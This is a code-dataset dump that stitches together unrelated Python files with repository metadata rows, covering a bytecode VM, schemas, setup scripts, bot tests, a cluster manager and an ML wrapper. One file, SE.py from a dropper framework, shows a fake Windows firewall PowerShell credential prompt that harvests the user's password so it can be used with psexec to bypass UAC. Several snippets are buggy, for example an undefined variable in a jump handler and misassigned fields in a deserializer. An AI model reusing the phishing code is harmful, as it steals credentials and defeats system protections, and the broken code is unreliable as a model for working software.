self.stack[-1].value = args
def INT_TO_FLOAT(self, args):
self.stack[-1].value = float(self.stack[-1].value)
def UNDEFINED_TO_ZERO_INT(self, args):
self.stack[-1].value = 0
def FLOAT_TO_INT(self, args):
self.stack[-1].value = int(self.stack[-1].value)
def PUSH_REF(self, args):
self.stack.append(StackItem(args))
def SHORTJMP(self, args):
self.cur += args
def SHORTJMPTRUE(self, args):
if self.stack[-1] not in [0, None, Undefined]:
self.cur += args
def SHORTJMPTRUE_REG(self, args):
print(self.stack[-1])
if self.registers[arg[0]] not in [0, None, Undefined]:
self.cur += args[1]
def SHORTJMPFALSE(self, args):
if self.stack[-1] in [0, None, Undefined]:
self.cur += args
def SHORTJMPFALSE_REG(self, args):
if self.registers[args[0]] in [0, None, Undefined]:
self.cur += args[1]
def LONGJMP(self, args):
self.cur = self.registers[args]
def PUSHTRY(self, args):
self.trystack.append(args)
def POPTRY(self, args):
self.trystack.pop()
def THROW(self, args):
self.throw_error(args)
def ARRAY_REF(self, args):
pass
def ARRAY_SET(self, args):
pass
def ADD_INT(self, args):
self.stack[-1].value = int(self.registers[2] + self.registers[3])
def SUB_INT(self, args):
self.stack[-1].value = int(self.registers[2] - self.registers[3])
def MUL_INT(self, args):
self.stack[-1].value = int(self.registers[2] * self.registers[3])
def DIV_INT(self, args):
self.stack[-1].value = int(self.registers[2] / self.registers[3])
def MOD_INT(self, args):
self.stack[-1].value = int(self.registers[2] % self.registers[3])
def BITINV(self, args):
pass
def BITAND(self, args):
self.stack[-1].value = self.registers[2] & self.registers[3]
def BITOR(self, args):
self.stack[-1].value = self.registers[2] | self.registers[3]
def BITXOR(self, args):
self.stack[-1].value = self.registers[2] ^ self.registers[3]
def LSHIFT(self, args):
self.stack[-1].value = self.registers[2] << self.registers[3]
def RSHIFT(self, args):
self.stack[-1].value = self.registers[2] >> self.registers[3]
def NEGATE(self, args):
pass
def ADD_FLOAT(self, args):
self.stack[-1].value = self.registers[2] + self.registers[3]
def SUB_FLOAT(self, args):
self.stack[-1].value = self.registers[2] - self.registers[3]
def MUL_FLOAT(self, args):
self.stack[-1].value = self.registers[2] * self.registers[3]
def DIV_FLOAT(self, args):
self.stack[-1].value = self.registers[2] / self.registers[3]
def MOD_FLOAT(self, args):
self.stack[-1].value = self.registers[2] % self.registers[3]
def LTHAN_INT(self, args):
self.stack[-1].value = self.registers[2] < self.registers[3]
def GTHAN_INT(self, args):
self.stack[-1].value = self.registers[2] > self.registers[3]
def LTHANEQ_INT(self, args):
self.stack[-1].value = self.registers[2] <= self.registers[3]
def GTHANEQ_INT(self, args):
self.stack[-1].value = self.registers[2] >= self.registers[3]
def EQ_INT(self, args):
self.stack[-1].value = self.registers[2] == self.registers[3]
def NOTEQ_INT(self, args):
self.stack[-1].value = self.registers[2] != self.registers[3]
def NOT_INT(self, args):
pass
def LTHAN_FLOAT(self, args):
self.stack[-1].value = self.registers[2] < self.registers[3]
def GTHAN_FLOAT(self, args):
self.stack[-1].value = self.registers[2] > self.registers[3]
def LTHANEQ_FLOAT(self, args):
self.stack[-1].value = self.registers[2] <= self.registers[3]
def GTHANEQ_FLOAT(self, args):
self.stack[-1].value = self.registers[2] >= self.registers[3]
def EQ_FLOAT(self, args):
self.stack[-1].value = self.registers[2] == self.registers[3]
def NOTEQ_FLOAT(self, args):
self.stack[-1].value = self.registers[2] != self.registers[3]
def AND(self, args):
self.stack[-1].value = self.registers[2] and self.registers[3]
def OR(self, args):
self.stack[-1].value = self.registers[2] or self.registers[3]
def ADD(self, args):
pass
def SUB(self, args):
pass
def MUL(self, args):
pass
def DIV(self, args):
pass
def IN(self, args):
pass
| 27.589474 | 124 | 0.666997 | 1,972 | 13,105 | 4.158215 | 0.080122 | 0.109756 | 0.144268 | 0.177561 | 0.682073 | 0.530488 | 0.432561 | 0.382195 | 0.354878 | 0.296463 | 0 | 0.013581 | 0.174056 | 13,105 | 474 | 125 | 27.647679 | 0.743995 | 0.006715 | 0 | 0.196133 | 0 | 0 | 0.094151 | 0.001614 | 0 | 0 | 0 | 0 | 0 | 1 | 0.256906 | false | 0.027624 | 0.008287 | 0.019337 | 0.301105 | 0.041436 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b9b98f75040f721ed9ce4241046ef4a180cbd6ce | 310 | py | Python | flask-app/app/app/schemas/base.py | mcelisr1/flask-docker-backend-stack | 07c640401c42db843ba3e77bba460224591506ab | [
"MIT"
] | 2 | 2019-04-30T23:48:36.000Z | 2019-07-17T15:26:57.000Z | flask-app/app/app/schemas/base.py | mcelisr1/flask-docker-backend-stack | 07c640401c42db843ba3e77bba460224591506ab | [
"MIT"
] | null | null | null | flask-app/app/app/schemas/base.py | mcelisr1/flask-docker-backend-stack | 07c640401c42db843ba3e77bba460224591506ab | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Import installed packages
from marshmallow import fields
from marshmallow import Schema
class BaseSchema(Schema):
def __init__(self, strict=True, **kwargs):
super(Schema, self).__init__(strict=strict, **kwargs)
id = fields.Int()
created_at = fields.DateTime()
| 22.142857 | 61 | 0.693548 | 37 | 310 | 5.567568 | 0.648649 | 0.145631 | 0.203884 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003937 | 0.180645 | 310 | 13 | 62 | 23.846154 | 0.807087 | 0.151613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.857143 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
b9c4573248ef113cd2314d5a05238921707f801c | 2,055 | py | Python | basic_samples/SDS/Python/SDSPy/Python3/DataviewGroupRule.py | hanhossain/OCS-Samples | 6f0f7878e6d9bccc32b6d663446678e070859d14 | [
"Apache-2.0"
] | null | null | null | basic_samples/SDS/Python/SDSPy/Python3/DataviewGroupRule.py | hanhossain/OCS-Samples | 6f0f7878e6d9bccc32b6d663446678e070859d14 | [
"Apache-2.0"
] | null | null | null | basic_samples/SDS/Python/SDSPy/Python3/DataviewGroupRule.py | hanhossain/OCS-Samples | 6f0f7878e6d9bccc32b6d663446678e070859d14 | [
"Apache-2.0"
] | null | null | null | # DataviewGroupRule.py
#
# Copyright (C) 2018 OSIsoft, LLC. All rights reserved.
#
# THIS SOFTWARE CONTAINS CONFIDENTIAL INFORMATION AND TRADE SECRETS OF
# OSIsoft, LLC. USE, DISCLOSURE, OR REPRODUCTION IS PROHIBITED WITHOUT
# THE PRIOR EXPRESS WRITTEN PERMISSION OF OSIsoft, LLC.
#
# RESTRICTED RIGHTS LEGEND
# Use, duplication, or disclosure by the Government is subject to restrictions
# as set forth in subparagraph (c)(1)(ii) of the Rights in Technical Data and
# Computer Software clause at DFARS 252.227.7013
#
# OSIsoft, LLC
# 1600 Alvarado St, San Leandro, CA 94577
import json
class DataviewGroupRule(object):
"""Sds dataview definition"""
@property
def Id(self):
return self.__id
@Id.setter
def Id(self, id):
self.__id = id
@property
def Type(self):
return self.__type
@Type.setter
def Type(self, type_):
self.__type = type_
@property
def TokenRules(self):
return self.__tokenRules
@TokenRules.setter
def TokenRules(self, tokenRules):
self.__tokenRules = tokenRules
def toJson(self):
return json.dumps(self.toDictionary())
def toDictionary(self):
# required properties
dictionary = { 'Id' : self.Id}
if hasattr(self, 'Type'):
dictionary['Type'] = self.Type
if hasattr(self, 'TokenRules'):
dictionary['TokenRules'] = self.TokenRules
return dictionary
@staticmethod
def fromJson(jsonObj):
return DataviewGroupRule.fromDictionary(jsonObj)
@staticmethod
def fromDictionary(content):
dataviewGroupRule = DataviewGroupRule()
if len(content) == 0:
return dataviewGroupRule
if 'Id' in content:
dataviewGroupRule.Id = content['Id']
if 'Type' in content:
dataviewGroupRule.Id = content['Type']
if 'TokenRules' in content:
dataviewGroupRule.Id = content['TokenRules']
return dataviewGroupRule
| 24.759036 | 78 | 0.637956 | 219 | 2,055 | 5.922374 | 0.420091 | 0.03084 | 0.032382 | 0.064765 | 0.080956 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01679 | 0.275426 | 2,055 | 82 | 79 | 25.060976 | 0.854265 | 0.287105 | 0 | 0.159091 | 0 | 0 | 0.042966 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.227273 | false | 0 | 0.022727 | 0.113636 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
b9c8a1d404db5a7007ea8d82fa56259be8237f8f | 1,782 | py | Python | tests/lib/test_common.py | Dylnuge/lunch-bot | 8770bac9e7a824d9ed75e7aa3abcc112be840509 | [
"MIT"
] | 1 | 2020-02-19T19:52:41.000Z | 2020-02-19T19:52:41.000Z | tests/lib/test_common.py | Dylnuge/lunch-bot | 8770bac9e7a824d9ed75e7aa3abcc112be840509 | [
"MIT"
] | 11 | 2020-01-14T23:32:40.000Z | 2020-02-07T17:51:13.000Z | tests/lib/test_common.py | Dylnuge/lunch-bot | 8770bac9e7a824d9ed75e7aa3abcc112be840509 | [
"MIT"
] | 2 | 2020-02-19T19:53:30.000Z | 2020-02-20T15:02:53.000Z | from lib.common import min_edit_distance
from lib.common import send_reply
def test_send_reply(mock_client, make_zulip_message):
"""
Tests that send_reply functions correctly.
"""
mock_client.email = "lunch-bot-bot@zulipchat.com"
message, _ = make_zulip_message("help")
send_reply(
mock_client, message, "Here is a reply!",
)
mock_client.send_message.assert_called_with(
{"type": "private", "to": ["tester@email.com",], "content": "Here is a reply!",}
)
def test_min_edit_distance_insert():
"""
Tests that the insert cost functions correctly. Forced to insert by making
the source string empty.
"""
assert 1234 == min_edit_distance("", "a", insert_cost=lambda char: 1234)
def test_min_edit_distance_delete():
"""
Tests that the delete cost functions correctly. Forced to delete by making
the target string empty.
"""
assert 1234 == min_edit_distance("a", "", delete_cost=lambda char: 1234)
def test_min_edit_distance_replace():
"""
Tests that the replace cost functions correctly.
"""
assert 1234 == min_edit_distance(
"a",
"b",
insert_cost=lambda char: 5000,
delete_cost=lambda char: 5000,
replace_cost=lambda source_char, target_char: 1234,
)
def test_min_edit_distance_equal():
"""
Ensures that when two strings are the same, the min edit distance metric has
a cost of 0.
"""
assert 0 == min_edit_distance("same_string", "same_string")
assert 0 == min_edit_distance("abc", "abc")
def test_min_edit_distance():
"""
General test cases for min edit distance between two words.
"""
assert 1 == min_edit_distance("cat", "cats")
assert 4 == min_edit_distance("door", "gore")
| 27.415385 | 88 | 0.667789 | 241 | 1,782 | 4.684647 | 0.319502 | 0.093003 | 0.199291 | 0.062002 | 0.317095 | 0.186005 | 0.162976 | 0.136404 | 0.070859 | 0 | 0 | 0.026657 | 0.2211 | 1,782 | 64 | 89 | 27.84375 | 0.786744 | 0.247475 | 0 | 0 | 0 | 0 | 0.117932 | 0.021809 | 0 | 0 | 0 | 0 | 0.275862 | 1 | 0.206897 | false | 0 | 0.068966 | 0 | 0.275862 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b9c92bf3f64934fbd92e6caa603001f0df9f4a83 | 560 | py | Python | setup.py | perlduck/check-mk-web-api | 37d58ab6f35ce9b176820dbb594d3079d747ba2a | [
"MIT"
] | null | null | null | setup.py | perlduck/check-mk-web-api | 37d58ab6f35ce9b176820dbb594d3079d747ba2a | [
"MIT"
] | null | null | null | setup.py | perlduck/check-mk-web-api | 37d58ab6f35ce9b176820dbb594d3079d747ba2a | [
"MIT"
] | null | null | null | from setuptools import setup
setup(
name='check_mk_web_api',
packages=['check_mk_web_api'],
version='1.7',
description='Library to talk to Check_Mk Web API',
author='Max Brenner',
author_email='xamrennerb@gmail.com',
url='https://github.com/brennerm/check-mk-web-api',
download_url='https://github.com/brennerm/check-mk-web-api/archive/1.6.tar.gz',
install_requires=['enum34;python_version<"3.4"', 'six'],
setup_requires=['pytest-runner'],
tests_require=['pytest'],
keywords=['check_mk', 'api', 'monitoring']
)
| 32.941176 | 83 | 0.683929 | 79 | 560 | 4.670886 | 0.582278 | 0.113821 | 0.135501 | 0.176152 | 0.205962 | 0.205962 | 0.205962 | 0.205962 | 0.205962 | 0 | 0 | 0.016563 | 0.1375 | 560 | 16 | 84 | 35 | 0.747412 | 0 | 0 | 0 | 0 | 0.066667 | 0.496429 | 0.048214 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.066667 | 0 | 0.066667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b9d06700171349672e188b624ea7e9f5f6e96ad7 | 1,643 | py | Python | src/uff/probe.py | davidbradway/uff.py | 118001211018a4fc95d1dd7304ae6335bdf805f9 | [
"MIT"
] | null | null | null | src/uff/probe.py | davidbradway/uff.py | 118001211018a4fc95d1dd7304ae6335bdf805f9 | [
"MIT"
] | null | null | null | src/uff/probe.py | davidbradway/uff.py | 118001211018a4fc95d1dd7304ae6335bdf805f9 | [
"MIT"
] | null | null | null | from dataclasses import dataclass
from typing import List
from uff.element import Element
from uff.element_geometry import ElementGeometry
from uff.impulse_response import ImpulseResponse
from uff.transform import Transform
from uff.uff_io import Serializable
@dataclass
class Probe(Serializable):
"""
Describes an generic ultrsound probe formed by a collection of elements.
Note:
Where focal_length specifies the lens focusing distance. Note that the
elements in element_geometry and impulse_response are referred by the
fields inside each member in element, avoiding unnecessary replication
of information.
More compact, although less general, descriptions are available for:
uff.probe.linear_array,
uff.probe.curvilinear_array, and
uff.probe.matrix_array.
"""
@staticmethod
def str_name():
return 'probes'
def serialize(self):
assert isinstance(self.element_geometry, list), \
'Probe.element_geometry should be a list of element geometries!'
return super().serialize()
# @classmethod
# def deserialize(cls, data: dict):
# pass
# >> TODO: These parameters are not defined in the standard
number_elements: int
pitch: float
element_height: float
element_width: float
## <<
transform: Transform
# TODO for conformity call `elements`
element: List[Element]
element_impulse_response: List[ImpulseResponse] = None
focal_length: float = None
# >> TODO: These parameters are not defined in the standard
element_geometry: List[ElementGeometry] = None
## <<
| 28.824561 | 76 | 0.714547 | 196 | 1,643 | 5.892857 | 0.494898 | 0.030303 | 0.024242 | 0.038095 | 0.077922 | 0.077922 | 0.077922 | 0.077922 | 0.077922 | 0 | 0 | 0 | 0.223372 | 1,643 | 56 | 77 | 29.339286 | 0.905172 | 0.419355 | 0 | 0 | 0 | 0 | 0.076148 | 0.024636 | 0 | 0 | 0 | 0.017857 | 0.04 | 1 | 0.08 | false | 0 | 0.28 | 0.04 | 0.84 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
b9d0b4eefbdf66ccea0bdd0a403c55ad3c54d344 | 713 | py | Python | src/main/views.py | alwinlee/todoJS | 79fc2bd0ab2c8910dae0fb434dc1fbeb66de5e4a | [
"MIT"
] | null | null | null | src/main/views.py | alwinlee/todoJS | 79fc2bd0ab2c8910dae0fb434dc1fbeb66de5e4a | [
"MIT"
] | null | null | null | src/main/views.py | alwinlee/todoJS | 79fc2bd0ab2c8910dae0fb434dc1fbeb66de5e4a | [
"MIT"
] | null | null | null | from django.shortcuts import render, redirect
from django.template.loader import get_template
from django.http import HttpResponse, Http404, JsonResponse
from django.db import connection, connections
from django.db.utils import OperationalError
from django.utils import timezone
from django.contrib.auth.models import User
from django.contrib.auth import authenticate
from django.contrib import auth
from django.utils import timezone
from rest_framework import routers, serializers, viewsets, status
from rest_framework.response import Response
from datetime import datetime
import json, urllib, os, time
import xsetting.util as util
def index(request):
return render(request, 'main/index.html', locals())
| 31 | 65 | 0.830295 | 98 | 713 | 6.010204 | 0.469388 | 0.169779 | 0.086587 | 0.071307 | 0.112054 | 0.112054 | 0 | 0 | 0 | 0 | 0 | 0.004747 | 0.113604 | 713 | 22 | 66 | 32.409091 | 0.927215 | 0 | 0 | 0.117647 | 0 | 0 | 0.021038 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.882353 | 0.058824 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
b9d5131be0e5e9177d71e6840b6639f996f0c9b6 | 2,735 | py | Python | src/system/resource/cluster.py | HiEST/gpu-topo-aware | 8125c2875ad942b9cecd9d5178062ee0d5100d04 | [
"Apache-2.0"
] | 7 | 2019-02-28T09:53:59.000Z | 2022-01-06T06:18:02.000Z | src/system/resource/cluster.py | HiEST/gpu-topo-aware | 8125c2875ad942b9cecd9d5178062ee0d5100d04 | [
"Apache-2.0"
] | null | null | null | src/system/resource/cluster.py | HiEST/gpu-topo-aware | 8125c2875ad942b9cecd9d5178062ee0d5100d04 | [
"Apache-2.0"
] | 4 | 2018-05-06T14:42:10.000Z | 2021-11-30T03:28:49.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Keeps the list of resources in the cluster.
#
# Copyright © 2017 Marcelo Amaral <marcelo.amaral@bsc.es>
import os
import json
import machine
class Cluster:
def __init__(self, config, num_machines):
n, resources = self.read_config(config)
if num_machines <= 0:
num_machines = n
self.resources = resources
self.machines = self.set_machines(self.resources, num_machines)
self.profiles = self.set_profile(config)
def set_profile(self, config):
"""The profile describes the execution time of collocated applications. Because we have a simple topology
with only four GPUs and two sockets, the collocation is always meaning applications in both sockets. Such as:
application1 in 0-2 and application2 in 1-3. They are sharing the same inter-socket communication bus."""
file_name = json.loads(config.get("workload", "profile"))
cwd = os.getcwd()
path = os.path.join(cwd, "data/profiles/" + file_name + ".json")
with open(path, "r") as f:
data = f.read()
return json.loads(data)
def set_machines(self, config, num_machines):
machines = dict()
for id in range(num_machines):
for type, mr in config["machines"].iteritems():
machines[id] = machine.Machine(mr, type, id)
print len(machines)
return machines
def read_config(self, config):
# TODO: the num_machines should also indicate the machine type
num_machines = json.loads(config.get("system", "num_machines"))
infra_file = json.loads(config.get("system", "infrastructure"))
cwd = os.getcwd()
path = os.path.join(cwd, "etc/" + infra_file + ".json")
with open(path, "r") as f:
data = f.read()
cluster_physical_resources = json.loads(data)
return num_machines, cluster_physical_resources
def get_num_free_gpus(self):
gpus = 0
for id, machine in self.machines.iteritems():
gpus += len(machine.get_free_gpus())
return gpus
def get_max_free_gpus_per_machine(self):
gpus = 0
for id, machine in self.machines.iteritems():
if len(machine.get_free_gpus()) > gpus:
gpus = len(machine.get_free_gpus())
return gpus
def get_free_gpus(self):
gpus = dict()
for id, machine in self.machines.iteritems():
machine_gpus = machine.get_free_gpus()
if len(machine_gpus) > 0:
if machine.id not in gpus:
gpus[machine.id] = dict()
gpus[machine.id] = machine_gpus
return gpus | 35.064103 | 117 | 0.616819 | 354 | 2,735 | 4.629944 | 0.316384 | 0.067114 | 0.033557 | 0.043929 | 0.23673 | 0.194631 | 0.194631 | 0.173276 | 0.139109 | 0.139109 | 0 | 0.007618 | 0.280073 | 2,735 | 78 | 118 | 35.064103 | 0.824276 | 0.072761 | 0 | 0.259259 | 0 | 0 | 0.041496 | 0 | 0 | 0 | 0 | 0.012821 | 0 | 0 | null | null | 0 | 0.055556 | null | null | 0.018519 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b9dda9ad337899d8f415f19554f3fc6367c0f010 | 747 | py | Python | src/models/logistic_regression.py | AlessandroVol23/predict_ico_success_lmu | 988c4eea58afe7379b1d527bfad9d9a5238c00d7 | [
"MIT"
] | null | null | null | src/models/logistic_regression.py | AlessandroVol23/predict_ico_success_lmu | 988c4eea58afe7379b1d527bfad9d9a5238c00d7 | [
"MIT"
] | 3 | 2020-03-24T18:01:15.000Z | 2021-08-23T20:37:50.000Z | src/models/logistic_regression.py | AlessandroVol23/predict_ico_success_lmu | 988c4eea58afe7379b1d527bfad9d9a5238c00d7 | [
"MIT"
] | null | null | null | from sklearn.linear_model import LogisticRegression
from src.models.base_model import BaseModel
class LogisticRegressionModel(BaseModel):
def __init__(self):
self.hyperparameter = {
"max_iter": 10000
}
pass
def get_name(self):
return 'logistic_regression'
def get_params(self):
return self.hyperparameter
def get_model(self, reinitialize=True):
if (reinitialize):
self.model = LogisticRegression(**self.hyperparameter)
return self.model
def fit(self, trn_x, trn_y, val_x=None, val_y=None):
self.model.fit(trn_x, trn_y)
def predict_proba(self, test_set):
preds = self.model.predict_proba(test_set)
return preds
| 24.096774 | 66 | 0.659973 | 90 | 747 | 5.244444 | 0.444444 | 0.076271 | 0.029661 | 0.033898 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008977 | 0.254351 | 747 | 30 | 67 | 24.9 | 0.83842 | 0 | 0 | 0 | 0 | 0 | 0.036145 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0.047619 | 0.095238 | 0.095238 | 0.619048 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
b9e2efcd77978181450991202864c9ace2f6c271 | 1,430 | py | Python | setup.py | yasserbdj96/ashar | dba8eab4e7e020776c3ba4736c01569ea0b24552 | [
"MIT"
] | null | null | null | setup.py | yasserbdj96/ashar | dba8eab4e7e020776c3ba4736c01569ea0b24552 | [
"MIT"
] | null | null | null | setup.py | yasserbdj96/ashar | dba8eab4e7e020776c3ba4736c01569ea0b24552 | [
"MIT"
] | null | null | null | from setuptools import setup,find_packages
setup(
name="ashar",
version="1.1.5",
author="Yasser Bdj (Boudjada Yasser)",
author_email="yasser.bdj96@gmail.com",
description='''This project is for data encryption with password protection.''',
long_description_content_type="text/markdown",
long_description=open('README.md','r').read(),
license='''MIT License''',
packages=find_packages(),
url="https://github.com/yasserbdj96/ashar",
project_urls={
'Author WebSite': "https://yasserbdj96.github.io/",
},
install_requires=['pipincluder'],
keywords=['yasserbdj96', 'python', 'encode', 'decode', 'key', 'password', 'encrypt anything with password', 'Ashar', 'Encryption', 'and', 'decryption.', 'This', 'project', 'is', 'for', 'data', 'encryption', 'with', 'password', 'protection.'],
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Operating System :: Unix",
"Operating System :: MacOS :: MacOS X",
"Operating System :: Microsoft :: Windows",
"Topic :: Software Development :: Build Tools",
"Topic :: Software Development :: Libraries :: Python Modules",
'Topic :: Communications :: Email'
],
python_requires=">=3.x.x"
) | 46.129032 | 247 | 0.618182 | 143 | 1,430 | 6.111888 | 0.608392 | 0.04119 | 0.029748 | 0.036613 | 0.118993 | 0.118993 | 0.118993 | 0.118993 | 0.118993 | 0 | 0 | 0.012456 | 0.213986 | 1,430 | 31 | 248 | 46.129032 | 0.765125 | 0 | 0 | 0 | 0 | 0 | 0.562455 | 0.015703 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.064516 | 0.032258 | 0 | 0.032258 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
b9e41144b9fbc6a709c1232043b4319e2bea60ba | 286 | py | Python | Evie/__main__.py | LEGENDXOP/Evie | ad505f356c034fa19287da40691f8a664eedc4c8 | [
"BSD-3-Clause"
] | null | null | null | Evie/__main__.py | LEGENDXOP/Evie | ad505f356c034fa19287da40691f8a664eedc4c8 | [
"BSD-3-Clause"
] | null | null | null | Evie/__main__.py | LEGENDXOP/Evie | ad505f356c034fa19287da40691f8a664eedc4c8 | [
"BSD-3-Clause"
] | 3 | 2021-04-07T15:57:26.000Z | 2022-01-09T01:20:11.000Z | from sys import argv, exit
from Evie import tbot
from Evie import TOKEN
import Evie.events
try:
tbot.start(bot_token=TOKEN)
except Exception:
print("Bot Token Invalid")
exit(1)
if len(argv) not in (1, 3, 4):
tbot.disconnect()
else:
tbot.run_until_disconnected()
| 15.888889 | 33 | 0.702797 | 45 | 286 | 4.4 | 0.622222 | 0.080808 | 0.141414 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017467 | 0.199301 | 286 | 17 | 34 | 16.823529 | 0.847162 | 0 | 0 | 0 | 0 | 0 | 0.059649 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.307692 | 0 | 0.307692 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
b9f9d9f28968cc6d0543b6b18d535d7ad78bf139 | 576 | py | Python | resources/SE.py | mehrdad-shokri/Dr0p1t-Framework | db9bc2dc58f33357138e7bd03d2cd81f0189753d | [
"MIT"
] | 1,345 | 2017-02-11T23:00:45.000Z | 2022-03-28T13:22:11.000Z | resources/SE.py | crazykid199/Dr0p1t-Framework | f14071fa34b2c8e94b777f397019a08bc22cc22b | [
"MIT"
] | 29 | 2017-02-13T17:44:44.000Z | 2018-04-12T17:02:45.000Z | resources/SE.py | crazykid199/Dr0p1t-Framework | f14071fa34b2c8e94b777f397019a08bc22cc22b | [
"MIT"
] | 404 | 2017-02-12T16:12:41.000Z | 2022-02-28T02:40:54.000Z | #Written by: Karim shoair - D4Vinci ( Dr0p1t-Framework )
#In this script I store some SE tricks to use ;)
#Start
#Get the user password by fooling him and then uses it to run commands as the user by psexec to bypass UAC
def ask_pwd():
while True:
cmd = '''Powershell "$cred=$host.ui.promptforcredential('Windows firewall permission','',[Environment]::UserName,[Environment]::UserDomainName); echo $cred.getnetworkcredential().password;"'''
response = get_output(cmd)
if response.strip() != '' and not response.strip().startswith('[!]'): break
return response.strip()
| 48 | 194 | 0.730903 | 78 | 576 | 5.371795 | 0.782051 | 0.093079 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006012 | 0.133681 | 576 | 11 | 195 | 52.363636 | 0.833667 | 0.368056 | 0 | 0 | 0 | 0.166667 | 0.508333 | 0.425 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0.166667 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
b9faa5ca3e34b24c7365db5cf3098be254abc460 | 869 | py | Python | python-ardrone-master/opencv.py | Verbalist/DronHackAngle | b51ae8f4752fb0616b6bb32616c30ac9d36f6a11 | [
"MIT"
] | null | null | null | python-ardrone-master/opencv.py | Verbalist/DronHackAngle | b51ae8f4752fb0616b6bb32616c30ac9d36f6a11 | [
"MIT"
] | null | null | null | python-ardrone-master/opencv.py | Verbalist/DronHackAngle | b51ae8f4752fb0616b6bb32616c30ac9d36f6a11 | [
"MIT"
] | null | null | null | import os
import sys
import cv2
import numpy as np
import logging
MODEL_FILE = "model.mdl"
def detect(img, cascade):
gray = to_grayscale(img)
rects = cascade.detectMultiScale(gray, scaleFactor=1.3, minNeighbors=2, minSize=(15, 15), flags = cv2.CASCADE_SCALE_IMAGE)
if len(rects) == 0:
return []
return rects
#haarcascade_frontalface_alt.xml
#haarcascade_fullbody.xml
